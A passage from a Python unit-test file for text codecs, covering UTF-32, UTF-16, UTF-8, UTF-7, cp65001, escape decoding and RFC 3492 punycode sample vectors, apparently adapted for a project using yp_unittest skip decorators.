              b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m'
              b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m')

    def test_only_one_bom(self):
        _,_,reader,writer = codecs.lookup(self.encoding)
        # encode some stream
        s = io.BytesIO()
        f = writer(s)
        f.write("spam")
        f.write("spam")
        d = s.getvalue()
        # check whether there is exactly one BOM in it
        self.assertTrue(d == self.spamle or d == self.spambe)
        # try to read it back
        s = io.BytesIO(d)
        f = reader(s)
        self.assertEqual(f.read(), "spamspam")

    def test_badbom(self):
        s = io.BytesIO(4*b"\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

        s = io.BytesIO(8*b"\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

    def test_partial(self):
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "", # first byte of BOM read
                "", # second byte of BOM read
                "", # third byte of BOM read
                "", # fourth byte of BOM read => byteorder known
                "",
                "",
                "",
                "\x00",
                "\x00",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_handlers(self):
        self.assertEqual(('\ufffd', 1),
                         codecs.utf_32_decode(b'\x01', 'replace', True))
        self.assertEqual(('', 1),
                         codecs.utf_32_decode(b'\x01', 'ignore', True))

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_32_decode,
                          b"\xff", "strict", True)

    def test_decoder_state(self):
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spamle)
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spambe)

    def test_issue8941(self):
        # Issue #8941: insufficient result allocation when decoding into
        # surrogate pairs on UCS-2 builds.
        encoded_le = b'\xff\xfe\x00\x00' + b'\x00\x00\x01\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_decode(encoded_le)[0])
        encoded_be = b'\x00\x00\xfe\xff' + b'\x00\x01\x00\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_decode(encoded_be)[0])
@yp_unittest.skip_str_codecs
class UTF32LETest(ReadTest, yp_unittest.TestCase):
    """UTF-32 little-endian codec (no BOM handling)."""
    encoding = "utf-32-le"
    ill_formed_sequence = b"\x80\xdc\x00\x00"

    def test_partial(self):
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "",
                "",
                "\x00",
                "\x00",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_simple(self):
        self.assertEqual("\U00010203".encode(self.encoding), b"\x03\x02\x01\x00")

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_32_le_decode,
                          b"\xff", "strict", True)

    def test_issue8941(self):
        # Issue #8941: insufficient result allocation when decoding into
        # surrogate pairs on UCS-2 builds.
        encoded = b'\x00\x00\x01\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_le_decode(encoded)[0])
@yp_unittest.skip_str_codecs
class UTF32BETest(ReadTest, yp_unittest.TestCase):
    """UTF-32 big-endian codec (no BOM handling)."""
    encoding = "utf-32-be"
    ill_formed_sequence = b"\x00\x00\xdc\x80"

    def test_partial(self):
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "",
                "",
                "\x00",
                "\x00",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_simple(self):
        self.assertEqual("\U00010203".encode(self.encoding), b"\x00\x01\x02\x03")

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_32_be_decode,
                          b"\xff", "strict", True)

    def test_issue8941(self):
        # Issue #8941: insufficient result allocation when decoding into
        # surrogate pairs on UCS-2 builds.
        encoded = b'\x00\x01\x00\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_be_decode(encoded)[0])
@yp_unittest.skip_str_codecs
class UTF16Test(ReadTest, yp_unittest.TestCase):
    """UTF-16 codec (BOM auto-detecting variant)."""
    encoding = "utf-16"
    # Native-endian encoding of the lone surrogate U+DC80.
    if sys.byteorder == 'little':
        ill_formed_sequence = b"\x80\xdc"
    else:
        ill_formed_sequence = b"\xdc\x80"

    spamle = b'\xff\xfes\x00p\x00a\x00m\x00s\x00p\x00a\x00m\x00'
    spambe = b'\xfe\xff\x00s\x00p\x00a\x00m\x00s\x00p\x00a\x00m'

    def test_only_one_bom(self):
        _,_,reader,writer = codecs.lookup(self.encoding)
        # encode some stream
        s = io.BytesIO()
        f = writer(s)
        f.write("spam")
        f.write("spam")
        d = s.getvalue()
        # check whether there is exactly one BOM in it
        self.assertTrue(d == self.spamle or d == self.spambe)
        # try to read it back
        s = io.BytesIO(d)
        f = reader(s)
        self.assertEqual(f.read(), "spamspam")

    def test_badbom(self):
        s = io.BytesIO(b"\xff\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

        s = io.BytesIO(b"\xff\xff\xff\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

    def test_partial(self):
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "", # first byte of BOM read
                "", # second byte of BOM read => byteorder known
                "",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_handlers(self):
        self.assertEqual(('\ufffd', 1),
                         codecs.utf_16_decode(b'\x01', 'replace', True))
        self.assertEqual(('', 1),
                         codecs.utf_16_decode(b'\x01', 'ignore', True))

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_16_decode,
                          b"\xff", "strict", True)

    def test_decoder_state(self):
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spamle)
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spambe)

    def test_bug691291(self):
        # Files are always opened in binary mode, even if no binary mode was
        # specified. This means that no automatic conversion of '\n' is done
        # on reading and writing.
        s1 = 'Hello\r\nworld\r\n'

        s = s1.encode(self.encoding)
        self.addCleanup(support.unlink, support.TESTFN)
        with open(support.TESTFN, 'wb') as fp:
            fp.write(s)
        with support.check_warnings(('', DeprecationWarning)):
            reader = codecs.open(support.TESTFN, 'U', encoding=self.encoding)
        with reader:
            self.assertEqual(reader.read(), s1)
@yp_unittest.skip_str_codecs
class UTF16LETest(ReadTest, yp_unittest.TestCase):
    """UTF-16 little-endian codec (no BOM handling)."""
    encoding = "utf-16-le"
    ill_formed_sequence = b"\x80\xdc"

    def test_partial(self):
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_errors(self):
        # (raw bytes, expected "replace"-decoded text)
        tests = [
            (b'\xff', '\ufffd'),
            (b'A\x00Z', 'A\ufffd'),
            (b'A\x00B\x00C\x00D\x00Z', 'ABCD\ufffd'),
            (b'\x00\xd8', '\ufffd'),
            (b'\x00\xd8A', '\ufffd'),
            (b'\x00\xd8A\x00', '\ufffdA'),
            (b'\x00\xdcA\x00', '\ufffdA'),
        ]
        for raw, expected in tests:
            self.assertRaises(UnicodeDecodeError, codecs.utf_16_le_decode,
                              raw, 'strict', True)
            self.assertEqual(raw.decode('utf-16le', 'replace'), expected)

    def test_nonbmp(self):
        self.assertEqual("\U00010203".encode(self.encoding),
                         b'\x00\xd8\x03\xde')
        self.assertEqual(b'\x00\xd8\x03\xde'.decode(self.encoding),
                         "\U00010203")
@yp_unittest.skip_str_codecs
class UTF16BETest(ReadTest, yp_unittest.TestCase):
    """UTF-16 big-endian codec (no BOM handling)."""
    encoding = "utf-16-be"
    ill_formed_sequence = b"\xdc\x80"

    def test_partial(self):
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_errors(self):
        # (raw bytes, expected "replace"-decoded text)
        tests = [
            (b'\xff', '\ufffd'),
            (b'\x00A\xff', 'A\ufffd'),
            (b'\x00A\x00B\x00C\x00DZ', 'ABCD\ufffd'),
            (b'\xd8\x00', '\ufffd'),
            (b'\xd8\x00\xdc', '\ufffd'),
            (b'\xd8\x00\x00A', '\ufffdA'),
            (b'\xdc\x00\x00A', '\ufffdA'),
        ]
        for raw, expected in tests:
            self.assertRaises(UnicodeDecodeError, codecs.utf_16_be_decode,
                              raw, 'strict', True)
            self.assertEqual(raw.decode('utf-16be', 'replace'), expected)

    def test_nonbmp(self):
        self.assertEqual("\U00010203".encode(self.encoding),
                         b'\xd8\x00\xde\x03')
        self.assertEqual(b'\xd8\x00\xde\x03'.decode(self.encoding),
                         "\U00010203")
class UTF8Test(ReadTest, yp_unittest.TestCase):
    """UTF-8 codec."""
    encoding = "utf-8"
    ill_formed_sequence = b"\xed\xb2\x80"
    # Each of the three bytes is replaced individually.
    ill_formed_sequence_replace = "\ufffd" * 3

    def test_partial(self):
        self.check_partial(
            "\x00\xff\u07ff\u0800\uffff\U00010000",
            [
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u07ff",
                "\x00\xff\u07ff",
                "\x00\xff\u07ff",
                "\x00\xff\u07ff\u0800",
                "\x00\xff\u07ff\u0800",
                "\x00\xff\u07ff\u0800",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff\U00010000",
            ]
        )

    def test_decoder_state(self):
        u = "\x00\x7f\x80\xff\u0100\u07ff\u0800\uffff\U0010ffff"
        self.check_state_handling_decode(self.encoding,
                                         u, u.encode(self.encoding))

    def test_lone_surrogates(self):
        super().test_lone_surrogates()
        # not sure if this is making sense for
        # UTF-16 and UTF-32
        self.assertEqual("[\uDC80]".encode('utf-8', "surrogateescape"),
                         b'[\x80]')

    def test_surrogatepass_handler(self):
        self.assertEqual("abc\ud800def".encode("utf-8", "surrogatepass"),
                         b"abc\xed\xa0\x80def")
        self.assertEqual(b"abc\xed\xa0\x80def".decode("utf-8", "surrogatepass"),
                         "abc\ud800def")
        self.assertEqual("\U00010fff\uD800".encode("utf-8", "surrogatepass"),
                         b"\xf0\x90\xbf\xbf\xed\xa0\x80")
        self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("utf-8", "surrogatepass"),
                         "\U00010fff\uD800")
        self.assertTrue(codecs.lookup_error("surrogatepass"))
        with self.assertRaises(UnicodeDecodeError):
            b"abc\xed\xa0".decode("utf-8", "surrogatepass")
        with self.assertRaises(UnicodeDecodeError):
            b"abc\xed\xa0z".decode("utf-8", "surrogatepass")
@yp_unittest.skipUnless(sys.platform == 'win32',
                        'cp65001 is a Windows-only codec')
@yp_unittest.skip_str_codecs
class CP65001Test(ReadTest, yp_unittest.TestCase):
    """Windows code page 65001 (the Win32 UTF-8 variant).

    Surrogate handling differs before/after Vista, hence the
    VISTA_OR_LATER branches below.
    """
    encoding = "cp65001"

    def test_encode(self):
        tests = [
            ('abc', 'strict', b'abc'),
            ('\xe9\u20ac', 'strict',  b'\xc3\xa9\xe2\x82\xac'),
            ('\U0010ffff', 'strict', b'\xf4\x8f\xbf\xbf'),
        ]
        if VISTA_OR_LATER:
            tests.extend((
                ('\udc80', 'strict', None),
                ('\udc80', 'ignore', b''),
                ('\udc80', 'replace', b'?'),
                ('\udc80', 'backslashreplace', b'\\udc80'),
                ('\udc80', 'surrogatepass', b'\xed\xb2\x80'),
            ))
        else:
            tests.append(('\udc80', 'strict', b'\xed\xb2\x80'))
        for text, errors, expected in tests:
            if expected is not None:
                try:
                    encoded = text.encode('cp65001', errors)
                except UnicodeEncodeError as err:
                    self.fail('Unable to encode %a to cp65001 with '
                              'errors=%r: %s' % (text, errors, err))
                self.assertEqual(encoded, expected,
                    '%a.encode("cp65001", %r)=%a != %a'
                    % (text, errors, encoded, expected))
            else:
                self.assertRaises(UnicodeEncodeError,
                    text.encode, "cp65001", errors)

    def test_decode(self):
        tests = [
            (b'abc', 'strict', 'abc'),
            (b'\xc3\xa9\xe2\x82\xac', 'strict', '\xe9\u20ac'),
            (b'\xf4\x8f\xbf\xbf', 'strict', '\U0010ffff'),
            (b'\xef\xbf\xbd', 'strict', '\ufffd'),
            (b'[\xc3\xa9]', 'strict', '[\xe9]'),
            # invalid bytes
            (b'[\xff]', 'strict', None),
            (b'[\xff]', 'ignore', '[]'),
            (b'[\xff]', 'replace', '[\ufffd]'),
            (b'[\xff]', 'surrogateescape', '[\udcff]'),
        ]
        if VISTA_OR_LATER:
            tests.extend((
                (b'[\xed\xb2\x80]', 'strict', None),
                (b'[\xed\xb2\x80]', 'ignore', '[]'),
                (b'[\xed\xb2\x80]', 'replace', '[\ufffd\ufffd\ufffd]'),
            ))
        else:
            tests.extend((
                (b'[\xed\xb2\x80]', 'strict', '[\udc80]'),
            ))
        for raw, errors, expected in tests:
            if expected is not None:
                try:
                    decoded = raw.decode('cp65001', errors)
                except UnicodeDecodeError as err:
                    self.fail('Unable to decode %a from cp65001 with '
                              'errors=%r: %s' % (raw, errors, err))
                self.assertEqual(decoded, expected,
                    '%a.decode("cp65001", %r)=%a != %a'
                    % (raw, errors, decoded, expected))
            else:
                self.assertRaises(UnicodeDecodeError,
                    raw.decode, 'cp65001', errors)

    @yp_unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
    def test_lone_surrogates(self):
        self.assertRaises(UnicodeEncodeError, "\ud800".encode, "cp65001")
        self.assertRaises(UnicodeDecodeError, b"\xed\xa0\x80".decode, "cp65001")
        self.assertEqual("[\uDC80]".encode("cp65001", "backslashreplace"),
                         b'[\\udc80]')
        self.assertEqual("[\uDC80]".encode("cp65001", "xmlcharrefreplace"),
                         b'[&#56448;]')
        self.assertEqual("[\uDC80]".encode("cp65001", "surrogateescape"),
                         b'[\x80]')
        self.assertEqual("[\uDC80]".encode("cp65001", "ignore"),
                         b'[]')
        self.assertEqual("[\uDC80]".encode("cp65001", "replace"),
                         b'[?]')

    @yp_unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
    def test_surrogatepass_handler(self):
        self.assertEqual("abc\ud800def".encode("cp65001", "surrogatepass"),
                         b"abc\xed\xa0\x80def")
        self.assertEqual(b"abc\xed\xa0\x80def".decode("cp65001", "surrogatepass"),
                         "abc\ud800def")
        self.assertEqual("\U00010fff\uD800".encode("cp65001", "surrogatepass"),
                         b"\xf0\x90\xbf\xbf\xed\xa0\x80")
        self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("cp65001", "surrogatepass"),
                         "\U00010fff\uD800")
        self.assertTrue(codecs.lookup_error("surrogatepass"))

    def test_readline(self):
        self.skipTest("issue #20571: code page 65001 codec does not "
                      "support partial decoder yet")
@yp_unittest.skip_str_codecs
class UTF7Test(ReadTest, yp_unittest.TestCase):
    """UTF-7 codec."""
    encoding = "utf-7"

    def test_partial(self):
        self.check_partial(
            'a+-b\x00c\x80d\u0100e\U00010000f',
            [
                'a',
                'a',
                'a+',
                'a+-',
                'a+-b',
                'a+-b',
                'a+-b',
                'a+-b',
                'a+-b',
                'a+-b\x00',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c\x80',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d\u0100',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e\U00010000',
                'a+-b\x00c\x80d\u0100e\U00010000f',
            ]
        )

    def test_errors(self):
        # (raw bytes, expected "replace"-decoded text)
        tests = [
            (b'a\xffb', 'a\ufffdb'),
            (b'a+IK', 'a\ufffd'),
            (b'a+IK-b', 'a\ufffdb'),
            (b'a+IK,b', 'a\ufffdb'),
            (b'a+IKx', 'a\u20ac\ufffd'),
            (b'a+IKx-b', 'a\u20ac\ufffdb'),
            (b'a+IKwgr', 'a\u20ac\ufffd'),
            (b'a+IKwgr-b', 'a\u20ac\ufffdb'),
            (b'a+IKwgr,', 'a\u20ac\ufffd'),
            (b'a+IKwgr,-b', 'a\u20ac\ufffd-b'),
            (b'a+IKwgrB', 'a\u20ac\u20ac\ufffd'),
            (b'a+IKwgrB-b', 'a\u20ac\u20ac\ufffdb'),
            (b'a+/,+IKw-b', 'a\ufffd\u20acb'),
            (b'a+//,+IKw-b', 'a\ufffd\u20acb'),
            (b'a+///,+IKw-b', 'a\uffff\ufffd\u20acb'),
            (b'a+////,+IKw-b', 'a\uffff\ufffd\u20acb'),
        ]
        for raw, expected in tests:
            with self.subTest(raw=raw):
                self.assertRaises(UnicodeDecodeError, codecs.utf_7_decode,
                                  raw, 'strict', True)
                self.assertEqual(raw.decode('utf-7', 'replace'), expected)

    def test_nonbmp(self):
        self.assertEqual('\U000104A0'.encode(self.encoding), b'+2AHcoA-')
        self.assertEqual('\ud801\udca0'.encode(self.encoding), b'+2AHcoA-')
        self.assertEqual(b'+2AHcoA-'.decode(self.encoding), '\U000104A0')

    # UTF-7 round-trips lone surrogates; the inherited test does not apply.
    test_lone_surrogates = None
@yp_unittest.skip_str_codecs
class UTF16ExTest(yp_unittest.TestCase):
    """Error handling of the utf_16_ex_decode primitive."""

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_16_ex_decode, b"\xff", "strict", 0, True)

    def test_bad_args(self):
        self.assertRaises(TypeError, codecs.utf_16_ex_decode)
@yp_unittest.skip_str_codecs
class ReadBufferTest(yp_unittest.TestCase):
    """Tests for the codecs.readbuffer_encode() helper."""

    def test_array(self):
        import array
        self.assertEqual(
            codecs.readbuffer_encode(array.array("b", b"spam")),
            (b"spam", 4)
        )

    def test_empty(self):
        self.assertEqual(codecs.readbuffer_encode(""), (b"", 0))

    def test_bad_args(self):
        self.assertRaises(TypeError, codecs.readbuffer_encode)
        self.assertRaises(TypeError, codecs.readbuffer_encode, 42)
@yp_unittest.skip_str_codecs
class UTF8SigTest(UTF8Test, yp_unittest.TestCase):
    """UTF-8 codec with BOM ("utf-8-sig"): the first BOM is skipped."""
    encoding = "utf-8-sig"

    def test_partial(self):
        self.check_partial(
            "\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
            [
                "",
                "",
                "", # First BOM has been read and skipped
                "",
                "",
                "\ufeff", # Second BOM has been read and emitted
                "\ufeff\x00", # "\x00" read and emitted
                "\ufeff\x00", # First byte of encoded "\xff" read
                "\ufeff\x00\xff", # Second byte of encoded "\xff" read
                "\ufeff\x00\xff", # First byte of encoded "\u07ff" read
                "\ufeff\x00\xff\u07ff", # Second byte of encoded "\u07ff" read
                "\ufeff\x00\xff\u07ff",
                "\ufeff\x00\xff\u07ff",
                "\ufeff\x00\xff\u07ff\u0800",
                "\ufeff\x00\xff\u07ff\u0800",
                "\ufeff\x00\xff\u07ff\u0800",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
            ]
        )

    def test_bug1601501(self):
        # SF bug #1601501: check that the codec works with a buffer
        # NOTE(review): module-level `str` is overridden to raise until this
        # script is converted to yp_str; the class is skip-decorated, so this
        # line only runs once that conversion lands — confirm then.
        self.assertEqual(str(b"\xef\xbb\xbf", "utf-8-sig"), "")

    def test_bom(self):
        d = codecs.getincrementaldecoder("utf-8-sig")()
        s = "spam"
        self.assertEqual(d.decode(s.encode("utf-8-sig")), s)

    def test_stream_bom(self):
        unistring = "ABC\u00A1\u2200XYZ"
        bytestring = codecs.BOM_UTF8 + b"ABC\xC2\xA1\xE2\x88\x80XYZ"

        reader = codecs.getreader("utf-8-sig")
        for sizehint in [None] + list(range(1, 11)) + \
                        [64, 128, 256, 512, 1024]:
            istream = reader(io.BytesIO(bytestring))
            ostream = io.StringIO()
            while 1:
                if sizehint is not None:
                    data = istream.read(sizehint)
                else:
                    data = istream.read()

                if not data:
                    break

                ostream.write(data)

            got = ostream.getvalue()
            self.assertEqual(got, unistring)

    def test_stream_bare(self):
        unistring = "ABC\u00A1\u2200XYZ"
        bytestring = b"ABC\xC2\xA1\xE2\x88\x80XYZ"

        reader = codecs.getreader("utf-8-sig")
        for sizehint in [None] + list(range(1, 11)) + \
                        [64, 128, 256, 512, 1024]:
            istream = reader(io.BytesIO(bytestring))
            ostream = io.StringIO()
            while 1:
                if sizehint is not None:
                    data = istream.read(sizehint)
                else:
                    data = istream.read()

                if not data:
                    break

                ostream.write(data)

            got = ostream.getvalue()
            self.assertEqual(got, unistring)
@yp_unittest.skip_str_codecs
class EscapeDecodeTest(yp_unittest.TestCase):
    """Tests for codecs.escape_decode() (Python string-escape semantics)."""

    def test_empty(self):
        self.assertEqual(codecs.escape_decode(b""), (b"", 0))

    def test_raw(self):
        # Every non-backslash byte passes through unchanged.
        decode = codecs.escape_decode
        for b in range(256):
            b = bytes([b])
            if b != b'\\':
                self.assertEqual(decode(b + b'0'), (b + b'0', 2))

    def test_escape(self):
        decode = codecs.escape_decode
        check = coding_checker(self, decode)
        check(b"[\\\n]", b"[]")
        check(br'[\"]', b'["]')
        check(br"[\']", b"[']")
        check(br"[\\]", br"[\]")
        check(br"[\a]", b"[\x07]")
        check(br"[\b]", b"[\x08]")
        check(br"[\t]", b"[\x09]")
        check(br"[\n]", b"[\x0a]")
        check(br"[\v]", b"[\x0b]")
        check(br"[\f]", b"[\x0c]")
        check(br"[\r]", b"[\x0d]")
        check(br"[\7]", b"[\x07]")
        check(br"[\8]", br"[\8]")
        check(br"[\78]", b"[\x078]")
        check(br"[\41]", b"[!]")
        check(br"[\418]", b"[!8]")
        check(br"[\101]", b"[A]")
        check(br"[\1010]", b"[A0]")
        check(br"[\501]", b"[A]")
        check(br"[\x41]", b"[A]")
        check(br"[\X41]", br"[\X41]")
        check(br"[\x410]", b"[A0]")
        # Unrecognized escapes are passed through with the backslash kept.
        for b in range(256):
            if b not in b'\n"\'\\abtnvfr01234567x':
                b = bytes([b])
                check(b'\\' + b, b'\\' + b)

    def test_errors(self):
        decode = codecs.escape_decode
        self.assertRaises(ValueError, decode, br"\x")
        self.assertRaises(ValueError, decode, br"[\x]")
        self.assertEqual(decode(br"[\x]\x", "ignore"), (b"[]", 6))
        self.assertEqual(decode(br"[\x]\x", "replace"), (b"[?]?", 6))
        self.assertRaises(ValueError, decode, br"\x0")
        self.assertRaises(ValueError, decode, br"[\x0]")
        self.assertEqual(decode(br"[\x0]\x0", "ignore"), (b"[]", 8))
        self.assertEqual(decode(br"[\x0]\x0", "replace"), (b"[?]?", 8))
@yp_unittest.skip_str_codecs
class RecodingTest(yp_unittest.TestCase):
    """Regression test for a shutdown crash in _codecsmodule.c."""

    def test_recoding(self):
        # Python used to crash on this at exit because of a refcount
        # bug in _codecsmodule.c; merely running it without crashing
        # is the test.
        backing = io.BytesIO()
        wrapped = codecs.EncodedFile(backing, "unicode_internal", "utf-8")
        wrapped.write("a")
        wrapped.close()
# From RFC 3492
# (unicode string, expected punycode-encoded bytes) pairs taken from the
# RFC's appendix of sample strings.
punycode_testcases = [
    # A Arabic (Egyptian):
    ("\u0644\u064A\u0647\u0645\u0627\u0628\u062A\u0643\u0644"
     "\u0645\u0648\u0634\u0639\u0631\u0628\u064A\u061F",
     b"egbpdaj6bu4bxfgehfvwxn"),
    # B Chinese (simplified):
    ("\u4ED6\u4EEC\u4E3A\u4EC0\u4E48\u4E0D\u8BF4\u4E2D\u6587",
     b"ihqwcrb4cv8a8dqg056pqjye"),
    # C Chinese (traditional):
    ("\u4ED6\u5011\u7232\u4EC0\u9EBD\u4E0D\u8AAA\u4E2D\u6587",
     b"ihqwctvzc91f659drss3x8bo0yb"),
    # D Czech: Pro<ccaron>prost<ecaron>nemluv<iacute><ccaron>esky
    ("\u0050\u0072\u006F\u010D\u0070\u0072\u006F\u0073\u0074"
     "\u011B\u006E\u0065\u006D\u006C\u0075\u0076\u00ED\u010D"
     "\u0065\u0073\u006B\u0079",
     b"Proprostnemluvesky-uyb24dma41a"),
    # E Hebrew:
    ("\u05DC\u05DE\u05D4\u05D4\u05DD\u05E4\u05E9\u05D5\u05D8"
     "\u05DC\u05D0\u05DE\u05D3\u05D1\u05E8\u05D9\u05DD\u05E2"
     "\u05D1\u05E8\u05D9\u05EA",
     b"4dbcagdahymbxekheh6e0a7fei0b"),
    # F Hindi (Devanagari):
    ("\u092F\u0939\u0932\u094B\u0917\u0939\u093F\u0928\u094D"
     "\u0926\u0940\u0915\u094D\u092F\u094B\u0902\u0928\u0939"
     "\u0940\u0902\u092C\u094B\u0932\u0938\u0915\u0924\u0947"
     "\u0939\u0948\u0902",
     b"i1baa7eci9glrd9b2ae1bj0hfcgg6iyaf8o0a1dig0cd"),
    #(G) Japanese (kanji and hiragana):
    ("\u306A\u305C\u307F\u3093\u306A\u65E5\u672C\u8A9E\u3092"
     "\u8A71\u3057\u3066\u304F\u308C\u306A\u3044\u306E\u304B",
     b"n8jok5ay5dzabd5bym9f0cm5685rrjetr6pdxa"),
    # (H) Korean (Hangul syllables):
    ("\uC138\uACC4\uC758\uBAA8\uB4E0\uC0AC\uB78C\uB4E4\uC774"
     "\uD55C\uAD6D\uC5B4\uB97C\uC774\uD574\uD55C\uB2E4\uBA74"
     "\uC5BC\uB9C8\uB098\uC88B\uC744\uAE4C",
     b"989aomsvi5e83db1d2a355cv1e0vak1dwrv93d5xbh15a0dt30a5j"
     b"psd879ccm6fea98c"),
    # (I) Russian (Cyrillic):
    ("\u043F\u043E\u0447\u0435\u043C\u0443\u0436\u0435\u043E"
     "\u043D\u0438\u043D\u0435\u0433\u043E\u0432\u043E\u0440"
     "\u044F\u0442\u043F\u043E\u0440\u0443\u0441\u0441\u043A"
     "\u0438",
     b"b1abfaaepdrnnbgefbaDotcwatmq2g4l"),
    # (J) Spanish: Porqu<eacute>nopuedensimplementehablarenEspa<ntilde>ol
    ("\u0050\u006F\u0072\u0071\u0075\u00E9\u006E\u006F\u0070"
     "\u0075\u0065\u0064\u0065\u006E\u0073\u0069\u006D\u0070"
     "\u006C\u0065\u006D\u0065\u006E\u0074\u0065\u0068\u0061"
     "\u0062\u006C\u0061\u0072\u0065\u006E\u0045\u0073\u0070"
     "\u0061\u00F1\u006F\u006C",
     b"PorqunopuedensimplementehablarenEspaol-fmd56a"),
    # (K) Vietnamese:
    # T<adotbelow>isaoh<odotbelow>kh<ocirc>ngth<ecirchookabove>ch\
    # <ihookabove>n<oacute>iti<ecircacute>ngVi<ecircdotbelow>t
    ("\u0054\u1EA1\u0069\u0073\u0061\u006F\u0068\u1ECD\u006B"
     "\u0068\u00F4\u006E\u0067\u0074\u0068\u1EC3\u0063\u0068"
     "\u1EC9\u006E\u00F3\u0069\u0074\u0069\u1EBF\u006E\u0067"
     "\u0056\u0069\u1EC7\u0074",
     b"TisaohkhngthchnitingVit-kjcr8268qyxafd2f1b9g"),
    #(L) 3<nen>B<gumi><kinpachi><sensei>
    ("\u0033\u5E74\u0042\u7D44\u91D1\u516B\u5148\u751F",
     b"3B-ww4c5e180e575a65lsy2b"),
    # (M) <amuro><namie>-with-SUPER-MONKEYS
    ("\u5B89\u5BA4\u5948\u7F8E\u6075\u002D\u0077\u0069\u0074"
     "\u0068\u002D\u0053\u0055\u0050\u0045\u0052\u002D\u004D"
